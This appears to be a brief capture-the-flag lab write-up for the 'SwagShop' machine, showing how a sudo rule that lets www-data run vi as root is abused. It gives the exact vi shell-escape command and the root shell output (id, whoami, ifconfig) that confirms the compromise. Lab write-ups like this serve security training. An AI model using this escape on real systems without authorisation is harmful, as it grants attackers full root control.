SwagShop_Privilege_Escalation

Vi

---

www-data@swagshop:/var/www/html$ sudo -l
matching defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
user www-data may run the following commands on swagshop:
    (root) nopasswd: /usr/bin/vi /var/www/html/*

In this case, /var/www/html/* must to be supplied to vi with the sudo command i just need to append the rest,  -c ':!/bin/sh' /dev/null, at the end

www-data@swagshop:/var/www/html$ sudo -u root /usr/bin/vi /var/www/html/blahblahblah -c ':!/bin/sh' /dev/null
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# hostname
hostname
swagshop
# ifconfig
ifconfig
ens160    link encap:Ethernet  HWaddr 00:50:56:b9:51:ec  
          inet addr:10.10.10.140  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:51ec/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:51ec/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:1100551 errors:0 dropped:101 overruns:0 frame:0
          tx packets:1066674 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:190628626 (190.6 MB)  TX bytes:517181596 (517.1 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:2719 errors:0 dropped:0 overruns:0 frame:0
          tx packets:2719 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:306392 (306.3 KB)  TX bytes:306392 (306.3 KB)

System Level Compromise